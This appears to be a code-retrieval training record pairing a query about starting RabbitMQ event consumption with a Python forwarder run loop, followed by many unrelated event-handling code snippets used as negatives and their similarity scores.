1511989)):\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, False)\n skip(11)\n\n # Alive:\n for relative_id in (5390, 5391, 5393, 5392, 1, 5394, 5395, 5396, 5397, 5398, 5399):\n run_event(BASE_FLAG + relative_id)\n\n # FORSAKEN KNIGHT ORNSTEIN & SUN-EATER SMOUGH\n\n run_event(11515492) # Trigger. 
Handles all other events within.\n run_event(11512001) # Die.\n\n # DARK SUN GWYNDOLIN\n\n sound.disable_map_sound(1513802)\n skip_if_event_flag_off(6, EVENT.GwyndolinDead)\n # Already dead:\n run_event(11515382)\n obj.disable(1511890)\n sfx.delete_map_sfx(1511891, False)\n obj.disable(1511892)\n sfx.delete_map_sfx(1511893, False)\n skip(13)\n # Alive:\n # Disable Jareel fog (otherwise visible in boss start cutscene).\n obj.disable(1511970)\n sfx.delete_map_sfx(1511971, False)\n obj.disable(1511972)\n sfx.delete_map_sfx(1511973, False)\n for relative_id in (5380, 5381, 5383, 5382, 900, 5384, 5385, 5386, 450):\n run_event(BASE_FLAG + relative_id)\n\n # NEW: Abyssal King Jareel.\n sound.disable_map_sound(1513803)\n skip_if_event_flag_off(6, EVENT.JareelDead)\n # Already dead:\n run_event(11515372)\n obj.disable(1511970)\n sfx.delete_map_sfx(1511971, False)\n obj.disable(1511972)\n sfx.delete_map_sfx(1511973, False)\n skip(7)\n # Alive:\n run_event(11515370)\n run_event(11515371)\n run_event(11515373)\n run_event(11515372)\n run_event(11515374)\n run_event(11515375)\n run_event(11510901)\n\n # Open three doors for enemies (I think).\n for relative_door_id, base_slot in zip((251, 257, 258), (0, 20, 40)):\n run_event_with_slot(11510710, base_slot, (BASE_FLAG + relative_door_id, 6750,\n 1512000 + relative_door_id, 1512000 + relative_door_id - 1))\n for i, relative_enemy_id in enumerate((300, 301, 302, 305, 320, 321, 322, # Silver Knights\n 323, 324, 325, 326, 327, 328, 329, 500,\n 177, 178, 179, 180, 181, 181, 182, 183, # Darkwraiths\n 184, 185, 186, 187, 188, 189, 190)):\n run_event_with_slot(\n 11510710, base_slot + i + 1, (BASE_FLAG + relative_door_id, 1510000 + relative_enemy_id,\n 1512000 + relative_door_id, 1512000 + relative_door_id - 1))\n\n # Mimic triggers.\n for slot, relative_mimic_id in enumerate(range(4)):\n run_event_with_slot(11515200, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515210, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515220, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515230, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515240, slot, (1510200 + relative_mimic_id, 1512010 + relative_mimic_id))\n run_event_with_slot(11510850, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515190, slot, (1510200 + relative_mimic_id,))\n\n # Treasure chests.\n for i in range(1, 21):\n if i == 12 or i == 19:\n continue\n run_event_with_slot(11510600, i, (1511650 + i, 11510600 + i))\n anim.end_animation(1511662, 0) # Gwyn's chest already looted\n # Only activate chapel chest before Dark Anor Londo (replaced by Mimic).\n skip_if_event_flag_on(1, EVENT.DarkAnorLondo)\n run_event_with_slot(11510600, 19, (1511669, 11510619))\n\n # Non-respawning enemies.\n run_event_with_slot(11510860, 0, (1510250, 0)) # Haunting Semblance\n run_event_with_slot(11510860, 3, (6640, 0)) # Dark Anor Londo Knight 1\n run_event_with_slot(11510860, 4, (6650, 0)) # Dark Anor Londo Knight 2\n run_event_with_slot(11510870, 0, (CHR.DarkmoonGuardian,))\n\n # NEW: Allied Silver Knights and Sentinels stop respawning in Dark Anor Londo if killed (unless Jareel is dead).\n for slot, enemy_id in enumerate(DarkAnorLondoAllies):\n run_event_with_slot(11512050, slot, (enemy_id,))\n run_event_with_slot(11512150, slot, (enemy_id,)) # They also turn hostile again if attacked in Dark AL.\n\n # NEW: Darkwraiths stop respawning in Dark Anor Londo if killed (unless Jareel is alive).\n for slot, enemy_id in enumerate(Darkwraiths):\n 
run_event_with_slot(11512100, slot, (enemy_id,))\n\n # NEW: Scripted rampart battle between archers and Darkwraiths. Also disables gravity\n # for the high archer.\n run_event(11512040)\n\n # NEW: Scripted battle between Darkwraith and Pale Demons.\n run_event(11512041)\n\n # NEW: Angry Giant Blacksmith in Dark Anor Londo.\n run_event(11512042)\n\n # NEW: Capricious Thrall one-off attack on the rooftop.\n sound.disable_map_sound(1513804)\n obj.disable(1511974)\n sfx.delete_map_sfx(1511975, False)\n obj.disable(1511976)\n sfx.delete_map_sfx(1511977, False)\n obj.disable(1511978)\n sfx.delete_map_sfx(1511979, False)\n run_event(11512060) # Trigger and timer.\n run_event(11512061) # Death.", "def extract_all_io_events(events):\n result = []\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n if evt.type in [\n IpuTraceEvent.HOST_TO_DEVICE_TRANSFER,\n IpuTraceEvent.DEVICE_TO_HOST_TRANSFER\n ]:\n try:\n payload = json.loads(evt.data_transfer.data_transfer.decode('utf-8'))\n for t in payload[\"tensors\"]:\n result += [(evt.type, t[\"name\"])]\n except UnicodeDecodeError:\n pass\n return result", "def action(self):\n # --- Ruled Based Test Policy ---\n # Stay still just send communication event\n if self.uid == 0:\n if random.choice(list(range(50))) == 1 and self.comm_count < self.comm_limit:\n action = 3\n action_param = {}\n self.comm_count += 1\n else:\n action = 1\n action_param = {\"ang_accel\": (0 * math.pi / 180), \"accel\": 0}\n return action, action_param\n\n # Others\n # If wall in vision, rotate\n vision_array = self.vision[1]\n if 1 in vision_array[0]:\n accel = -1 if self.speed > 0 else 0\n action = 1\n action_param = {\"ang_accel\": (random.randint(20, 45) * math.pi / 180), \"accel\": accel}\n\n # If hider in front, tag\n elif self.agt_class == 3 and 2 in vision_array[0] and vision_array[1][list(vision_array[0]).index(2)] < 60:\n action = 2\n action_param = {}\n\n # Randomly invoked communication event\n # elif random.choice(list(range(50))) == 1 and self.comm_count < self.comm_limit:\n # action = 3\n # action_param = {}\n # self.comm_count += 1\n\n # If communication received head towards nearest comm. 
agent for three steps\n elif len(self.comm) > 0:\n closest_agent = min(self.comm, key=lambda x: x[0])\n\n # Calculate target angle to the event sender\n target_angle = closest_agent[1] + self.angle\n target_angle = 2*math.pi + target_angle if target_angle < 0 else target_angle\n target_angle = target_angle - 2*math.pi if target_angle > 2*math.pi else target_angle\n\n # Add target angle to history such that the agent moves until it finds the target angle\n self.history.append(target_angle)\n direction = closest_agent[1]/abs(closest_agent[1])\n action = 1\n action_param = {\"ang_accel\": direction*math.pi/18, \"accel\": -1 if self.speed > 0 else 0}\n\n # If target angle not found, continue searching\n elif len(self.history) > 0:\n direction = self.history[-1]/abs(self.history[-1])\n action = 1\n action_param = {\"ang_accel\": direction*math.pi/18, \"accel\": -1 if self.speed > 0 else 0}\n if self.history[-1] - math.pi/9 < self.angle < self.history[-1] + math.pi/9:\n self.history.pop(-1)\n\n # When there isn't a special event, just move forward\n else:\n st_rate = self.stamina/self.max_stamina\n if st_rate > 0.75:\n accel = np.random.normal(3, 1, 1)\n elif st_rate > 0.4:\n accel = np.random.randint(-1, 3)\n else:\n accel = -1\n action = 1\n action_param = {\"ang_accel\": (0 * math.pi / 180), \"accel\": accel}\n\n return action, action_param", "def dispatch_requests(\n self, run_to_events: Dict[str, Generator[tf.compat.v1.Event, None, None]]\n ):\n for (run_name, events) in run_to_events.items():\n self._dispatch_additional_senders(run_name)\n if events is not None:\n for event in events:\n _filter_graph_defs(event)\n for value in event.summary.value:\n self._request_sender.send_request(run_name, event, value)\n self._request_sender.flush()", "async def reporters(self, eventID: str) -> Iterable[str]:", "def event(self,evt,evn):\n #import pdb; pdb.set_trace()\n if (evt.get(\"skip_event\")):\n return\n # check if FEE data is one or two dimensional\n data = evt.get(Camera.FrameV1, self.src)\n if data is None:\n one_D = True\n data = evt.get(Bld.BldDataSpectrometerV1, self.src)\n else:\n one_D = False\n # get event timestamp\n timestamp = cspad_tbx.evt_timestamp(cspad_tbx.evt_time(evt)) # human readable format\n\n if data is None:\n self.nnodata +=1\n #self.logger.warning(\"event(): No spectrum data\")\n evt.put(skip_event_flag(),\"skip_event\")\n\n if timestamp is None:\n evt.put(skip_event_flag(),\"skip_event\")\n #self.logger.warning(\"event(): No TIMESTAMP, skipping shot\")\n\n elif data is not None:\n self.nshots +=1\n # get data as array and split into two half to find each peak\n if one_D:\n # filtering out outlier spikes in FEE data\n data = np.array(data.hproj().astype(np.float64))\n for i in range(len(data)):\n if data[i]>1000000000:\n data[i]=data[i]-(2**32)\n if self.dark is not None:\n data = data - self.dark\n spectrum = data\n spectrum1 = data[:data.shape[0]//2]\n spectrum2 = data[data.shape[0]//2:]\n else:\n data = np.array(data.data16().astype(np.int32))\n if self.dark is not None:\n data = data - self.dark\n data = np.double(data)\n data_split1 = data[:,:data.shape[1]//2]\n data_split2 = data[:,data.shape[1]//2:]\n # make a 1D trace of entire spectrum and each half to find peaks\n spectrum = np.sum(data,0)/data.shape[0]\n spectrum1 = np.sum(data_split1,0)/data_split1.shape[0]\n spectrum2 = np.sum(data_split2,0)/data_split2.shape[0]\n if not one_D:\n # the x-coordinate of the weighted center of peak region\n weighted_peak_one_positions = []\n for i in 
range(self.peak_one_range_min,self.peak_one_range_max):\n weighted_peak_one_positions.append(spectrum[i]*i)\n weighted_sum_peak_one = np.sum(weighted_peak_one_positions)\n weighted_peak_one_center_position = weighted_sum_peak_one/np.sum(spectrum[self.peak_one_range_min:self.peak_one_range_max])\n\n weighted_peak_two_positions = []\n for i in range(self.peak_two_range_min,self.peak_two_range_max):\n weighted_peak_two_positions.append(spectrum[i]*i)\n weighted_sum_peak_two = np.sum(weighted_peak_two_positions)\n weighted_peak_two_center_position = weighted_sum_peak_two/np.sum(spectrum[self.peak_two_range_min:self.peak_two_range_max])\n\n # normalized integrated regions between the peaks\n #int_left_region = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region = np.sum(spectrum[:weighted_peak_two_center_position/2])\n\n #int_left_region_norm = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region_norm = np.sum(spectrum[:weighted_peak_two_center_position/2])/len(spectrum[:weighted_peak_two_center_position/2])\n\n int_right_region = np.sum(spectrum[self.peak_two_range_max:])\n\n int_right_region_norm = np.sum(spectrum[self.peak_two_range_max:])/len(spectrum[self.peak_two_range_max:])\n\n # normalized integrated peaks\n int_peak_one = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_one_norm = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])/len(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_two = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n int_peak_two_norm = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n if not one_D:\n if int_peak_one_norm/int_peak_two_norm > self.peak_ratio:\n print(\"event(): inflection peak too high\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_left_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy left of low energy peak\")\n evt.put(skip_event_flag(), 
\"skip_event\")\n return\n if int_right_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy right of high energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n #self.logger.info(\"TIMESTAMP %s accepted\" %timestamp)\n self.naccepted += 1\n self.ntwo_color += 1\n print(\"%d Remote shot\" %self.ntwo_color)\n print(\"%s Remote timestamp\" %timestamp)", "def _extract_pre_basecalled_events(self):\n\t\t# try:\n\t\ttable = self.hdf5file[fastq_paths[self.version]['pre_basecalled']]\n\t\tevents = []\n\t\tfor read in table:\n\t\t\tevents.extend(table[read][\"Events\"][()])\n\t\tself.pre_basecalled_events = [Event(x) for x in events]\n\t\t# except Exception, e:\n\t\t\t# self.pre_basecalled_events = []", "def test_process_packet_event(self):\n pkt = {'type': 'event',\n 'name': 'woot',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called\n\n # processing an event packet with message id and ack\n pkt = {'type': 'event',\n 'id': 1,\n 'ack': 'data',\n 'name': 'tobi',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called", "def find_events(handler_input):\n \n slots = handler_input.request_envelope.request.intent.slots\n \n selected_event = slots['event_cat'].resolutions.resolutions_per_authority[0].values[0].value.name\n \n events_list = requests.get(\"http://3.17.148.9:8080/events\")\n length = 0\n\n if events_list.status_code == 200:\n events_list = events_list.content\n details = json.loads(events_list.decode('utf-8'))\n length = len(details)\n\n events = dict()\n response_text = \"\"\n for i in range(length):\n if details[i][\"event_category\"].lower() == selected_event:\n cat = details[i]['event']\n if cat not in events:\n events[cat] = 1\n else:\n events[cat] += 1\n \n for event, count in events.items():\n response_text += str(count) + + event+\", \"\n\n speech_text = \"I found {}\".format(response_text)\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"I found {}\".format(response_text), speech_text)).set_should_end_session(False)\n return handler_input.response_builder.response", "def test_api_predictor_events_get(self):\n pass", "def doeventmonitor(self):\n # this support must be explicitly turned on; by default, CORE will\n # generate the EMANE events when nodes are moved\n return self.session.get_config_item_bool(\"emane_event_monitor\", False)", "def event_filters(self) -> pulumi.Output[Sequence['outputs.EventFilterResponse']]:\n return pulumi.get(self, \"event_filters\")", "def events(self):\r\n return e.Events(self)", "def test_otoroshi_controllers_adminapi_events_controller_alert_events(self):\n pass", "def events(self, start=0, limit=15, etype=None):\r\n params = base.get_params(('start', 'limit', 'etype'), locals())\r\n url = '{0}/events/'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def events(self, start=0, limit=15, etype=None):\r\n params = base.get_params(('start', 'limit', 'etype'), locals())\r\n url = '{0}/events/'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def get_event_mapping():\r\n # Get all events:\r\n all_events = requests.get(base_url + 'check-ins/v2/events', headers=headers3).json()\r\n # Make Dict of event names and ids\r\n event_to_id = {event['attributes']['name']:event['id'] for event in all_events['data']} \r\n return 
event_to_id", "def events(self):\r\n return ev.Events(self)", "def events(self):\r\n return ev.Events(self)", "def get_events(self):\n events = []\n for device in self:\n events.extend(self[device].get_events())\n return events", "def _IncludedPaintEvents(self, events):\n def FirstLayoutTime(events):\n \"\"\"Get the start time of the first layout after a resource received.\"\"\"\n has_received_response = False\n for event in events:\n if event.name == 'ResourceReceiveResponse':\n has_received_response = True\n elif has_received_response and event.name == 'Layout':\n return event.start\n assert False, 'There were no layout events after resource receive events.'\n\n first_layout_time = FirstLayoutTime(events)\n paint_events = [e for e in events\n if e.start >= first_layout_time and e.name == 'Paint']\n return paint_events", "def get_possible_input(self):\n if self.possible_events:\n return [] + self.possible_events\n possible_events = []\n enabled_view_ids = []\n touch_exclude_view_ids = set()\n for view_dict in self.views:\n # exclude navigation bar if exists\n if self.__safe_dict_get(view_dict, 'enabled') and \\\n self.__safe_dict_get(view_dict, 'visible') and \\\n self.__safe_dict_get(view_dict, 'resource_id') not in \\\n ['android:id/navigationBarBackground',\n 'android:id/statusBarBackground']:\n enabled_view_ids.append(view_dict['temp_id'])\n # enabled_view_ids.reverse()\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'clickable'):\n possible_events.append(TouchEvent(view=self.views[view_id]))\n touch_exclude_view_ids.add(view_id)\n touch_exclude_view_ids.union(self.get_all_children(self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'scrollable'):\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"UP\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"DOWN\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"LEFT\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"RIGHT\"))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'checkable'):\n possible_events.append(TouchEvent(view=self.views[view_id]))\n touch_exclude_view_ids.add(view_id)\n touch_exclude_view_ids.union(self.get_all_children(self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'long_clickable'):\n possible_events.append(LongTouchEvent(view=self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'editable'):\n possible_events.append(SetTextEvent(view=self.views[view_id], text=\"Hello World\"))\n touch_exclude_view_ids.add(view_id)\n # TODO figure out what event can be sent to editable views\n pass\n\n for view_id in enabled_view_ids:\n if view_id in touch_exclude_view_ids:\n continue\n children = self.__safe_dict_get(self.views[view_id], 'children')\n if children and len(children) > 0:\n continue\n possible_events.append(TouchEvent(view=self.views[view_id]))\n\n # For old Android navigation bars\n # possible_events.append(KeyEvent(name=\"MENU\"))\n\n self.possible_events = possible_events\n return [] + possible_events", "def create_events():\n events = {}\n events[\"Workers_can_proceed\"] = mp.Event()\n for i in range(NUM_WORKERS):\n events[i] = mp.Event()\n return events", "def adbGetEvent( self, pars ):\n \n\t( id1, id2, id3, flag ) = pars\n\n\tif id3 == 1:\n\n\t e\t= self.adb.get( 'logEvents' 
)\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t if ny <= nx:\n\t\t\ty.append( e[j,2] )\n\t\t\tny\t+= 1\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t x.append( e[j,2] )\n\t\t nx\t+= 1\n\n\telif id3 == 2:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t if ny <= nx:\n\t\t\ty.append( e[j,2] )\n\t\t\tny\t+= 1\n\t\t else:\n\t\t\ty[-1]\t= e[j,2]\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t x.append( e[j,2] )\n\t\t nx\t+= 1\n\n\telif id3 == 3:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t y.append( e[j,2] )\n\t\t ny\t+= 1\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t n\t= ny - nx\n\t\t dx\t= 1. / n\n\t\t for i in range(1,n+1):\n\t\t\tx.append( e[j,2] - dx * (n-i) )\n\t\t nx\t+= n\n\n\telse:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= self.adb.get( 'steps' )\n\t y\t= []\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t y.append( e[j,2] )\n\n\tif flag == 1:\n\t y\t= numarray.array( y, 'd' )\n\t y\t= numarray.maximum( y, 1.e-20 )\n\n steps = self.adb.get( 'steps' )\n times = self.adb.get( 'times' )\n tIncs = self.adb.get( 'timeIncs' )\n nSteps = len( steps )\n xt = []\n i = 0\n for j in range(len(x)):\n while i < nSteps and steps[i] < x[j]:\n i += 1\n t = times[i] + (x[j] - steps[i]) * tIncs[i]\n xt.append( t )\n \n\tx \t= numarray.array( x ).flat\n\txt \t= numarray.array( xt ).flat\n\ty \t= numarray.array( y ).flat\n return( x, xt, y )", "def get_all(self):\r\n return list(pecan.request.storage_conn.get_event_types())", "def both_events(self, Rover, name1, name2):\n func1 = self.event.get(name1)\n func2 = self.event.get(name2)\n return func1(Rover) and func2(Rover)", "def InitOtherEvents(self):\n\n pass", "def get_destination(event):\n if 'type' in event and event['type'] in logs:\n return logs[ event['type'] ]\n\n elif 'route' in event and event['route'] in logs:\n return logs[ event['route'] ]\n\n return logs.get('console')", "def get_network_events(self,\r\n options=dict()):\r\n\r\n # Validate required parameters\r\n self.validate_parameters(network_id=options.get(\"network_id\"))\r\n\r\n # Prepare query URL\r\n _url_path = '/networks/{networkId}/events'\r\n _url_path = APIHelper.append_url_with_template_parameters(_url_path, { \r\n 'networkId': options.get('network_id', None)\r\n })\r\n _query_builder = Configuration.base_uri\r\n _query_builder += _url_path\r\n _query_parameters = {\r\n 'productType': options.get('product_type', None),\r\n 'includedEventTypes': options.get('included_event_types', None),\r\n 'excludedEventTypes': options.get('excluded_event_types', None),\r\n 'deviceMac': options.get('device_mac', None),\r\n 'deviceSerial': options.get('device_serial', None),\r\n 'deviceName': options.get('device_name', None),\r\n 'clientIp': options.get('client_ip', None),\r\n 'clientMac': options.get('client_mac', None),\r\n 'clientName': options.get('client_name', None),\r\n 'smDeviceMac': options.get('sm_device_mac', None),\r\n 'smDeviceName': options.get('sm_device_name', None),\r\n 'perPage': options.get('per_page', None),\r\n 'startingAfter': options.get('starting_after', None),\r\n 'endingBefore': options.get('ending_before', None)\r\n }\r\n _query_builder = APIHelper.append_url_with_query_parameters(_query_builder,\r\n _query_parameters, 
Configuration.array_serialization)\r\n _query_url = APIHelper.clean_url(_query_builder)\r\n\r\n # Prepare headers\r\n _headers = {\r\n 'accept': 'application/json'\r\n }\r\n\r\n # Prepare and execute request\r\n _request = self.http_client.get(_query_url, headers=_headers)\r\n CustomHeaderAuth.apply(_request)\r\n _context = self.execute_request(_request)\r\n self.validate_response(_context)\r\n\r\n # Return appropriate type\r\n return APIHelper.json_deserialize(_context.response.raw_body)", "def receiverMapping():", "def get_hosts(self, target, listener_type):", "def _send_to_endpoint(self, events):\n raise NotImplementedError('Please implement _send_to_endpoint().')", "def get_api_event(self):\n pass", "def bootstrap_core_events() -> Sequence[EventDefinition[Any]]: # type: ignore\n return (\n (\n EVENT_ID_EVENT_LISTENER_ADDED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n EventListenerAddedEvent,\n EventListenerAddedEvent(EVENT_ID_EVENT_LISTENER_ADDED, NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REGISTER_EVENT,\n QUEUE_EVENT_HIGH, PRODUCE_EVENT_PROTECTION,\n RegisterEventEvent,\n RegisterEventEvent(\n EVENT_ID_DISPOSE_COMPLETE, QUEUE_EVENT_IO, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent, DisposeCompleteEvent(NOT_PARTICIPANT)\n ),\n ),\n (\n EVENT_ID_DISPOSE_COMPLETE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent,\n DisposeCompleteEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REQUEST_DISPOSE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestDisposeEvent,\n RequestDisposeEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_COMPONENT_CREATED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreatedEvent,\n ComponentCreatedEvent(NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_COMPONENT_CREATION_FAILED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreationFailedEvent,\n ComponentCreationFailedEvent('x', 1, UserMessage(i18n(''))),\n ),\n (\n EVENT_ID_REQUEST_NEW_COMPONENT,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestNewComponentEvent,\n RequestNewComponentEvent(object(), NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_SYSTEM_STARTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemStartedEvent,\n SystemStartedEvent(),\n ),\n (\n EVENT_ID_SYSTEM_HALTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemHaltedEvent,\n SystemHaltedEvent()\n ),\n (\n EVENT_ID_ERROR,\n QUEUE_EVENT_HIGH, GLOBAL_EVENT_PROTECTION,\n ErrorEvent,\n ErrorEvent(ErrorReport('', ERROR_CATEGORY_USER, UserMessage(i18n(''))))\n ),\n )", "def get_events_batch() -> PayloadDictList:\n ...", "def event_log(self):\n pass" ]
[ "0.61217207", "0.55249405", "0.55249405", "0.5509148", "0.54260296", "0.53321046", "0.52999175", "0.52999175", "0.5238973", "0.5216273", "0.51892865", "0.51738495", "0.5165304", "0.51611227", "0.5153233", "0.51480025", "0.5140899", "0.51364225", "0.5098679", "0.50892186", "0.50705093", "0.5047507", "0.5023797", "0.5020151", "0.50179183", "0.5015156", "0.49881816", "0.49871737", "0.49834684", "0.4979714", "0.49514532", "0.49497008", "0.49453348", "0.4944602", "0.49353752", "0.4931676", "0.4927875", "0.4926667", "0.49103305", "0.49097088", "0.4904969", "0.4896881", "0.48931947", "0.48910326", "0.4889296", "0.48858628", "0.48850763", "0.48817575", "0.48797438", "0.4879215", "0.48755395", "0.48749632", "0.48715886", "0.4864401", "0.48634514", "0.4863281", "0.48602217", "0.48447776", "0.4843706", "0.4843706", "0.4839884", "0.4837274", "0.48359066", "0.48245016", "0.48205817", "0.48182014", "0.48160395", "0.48120746", "0.48092705", "0.4807888", "0.4806217", "0.4785315", "0.4773443", "0.47728893", "0.4769252", "0.4766935", "0.4762739", "0.4760643", "0.4754781", "0.47498062", "0.47498062", "0.47460216", "0.474252", "0.474252", "0.4740265", "0.47380275", "0.4737415", "0.472879", "0.47169113", "0.47147387", "0.47144756", "0.47141626", "0.47120908", "0.47110295", "0.4710771", "0.47102684", "0.47084495", "0.47054228", "0.47029775", "0.46993297", "0.4697782" ]
0.0
-1
Prepare to process RabbitMQ events and start consuming
def run(self):
    self.debug = self.forwarder_options.get("debug", "0") != "0"
    if self.debug:
        self.logger.setLevel(logging.DEBUG)

    processor_count = int(self.forwarder_options.get("message_processor_count", 1))
    cpu_count = multiprocessing.cpu_count()
    if processor_count > cpu_count:
        self.logger.info("processor_count (%s) > cpu_count. Defaulting to cpu_count", (processor_count, cpu_count))
        processor_count = cpu_count

    self.event_processor = EventProcessor(self.forwarder_options)
    self.processor_pool = multiprocessing.Pool(processor_count)

    while True:
        try:
            self.consume_message_bus(test=self.testing)
        except Exception as e:
            self.retry_attempts += 1
            if self.retry_attempts > self.max_retry_attempts:
                self.logger.critical("Too many attempts to reconnect (%d). Exiting now." % self.max_retry_attempts)
                break

            if isinstance(e, pika.exceptions.AMQPConnectionError) or isinstance(e, pika.exceptions.ConnectionClosed):
                self.logger.error("Connection is closed or refused, retrying in %s seconds" % self.retry_interval)
            else:
                self.logger.exception("An unexpected error occurred, retrying in %s seconds" % self.retry_interval)

            if self.connection is not None:
                self.connection.close()
                self.connection = None

            time.sleep(self.retry_interval)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_amqp_events(self):\n self.connection.process_data_events()", "def consume():\n with conn.channel() as chan:\n \n def on_msg_recv(msg):\n \"\"\" Called when message arrives from RabbitMQ\n \"\"\"\n print \"processor|%s::Received message: %s\" % (UID, msg.body)\n chan.basic_ack(msg.delivery_tag)\n log(msg.body)\n process_msg(msg)\n \n \n # Declare and bind queue. RabbitMQ does nothing if queue already exists.\n chan.exchange_declare(exchange = EXCHANGE,\n type = EXCHANGE_TYPE)\n queue = chan.queue_declare(QUEUE)\n chan.queue_bind(exchange = EXCHANGE, \n queue = QUEUE, \n routing_key = ROUTING_KEY)\n \n # Declare that we are going to listen to given queue\n chan.basic_consume(queue = QUEUE, \n callback = on_msg_recv)\n \n # Main loop. Waiting for messages from RabbitMQ.\n while True:\n chan.wait()", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def listen_commands(self):\n self._consumer_rabbit_connection = BlockingConnection(ConnectionParameters(self._rabbit_host))\n self._consumer_rabbit_channel = self._consumer_rabbit_connection.channel()\n\n # Listen buy/sell orders from external system\n self._listen_queue(QueueName.CMD_BUYSELL, self.on_cmd_buysell)\n self._listen_queue(QueueName.MSG_RAW, self.on_raw_msg)\n # self._logger.info(f\"Declaring rabbit queue {QueueName.CMD_BUYSELL}\")\n # 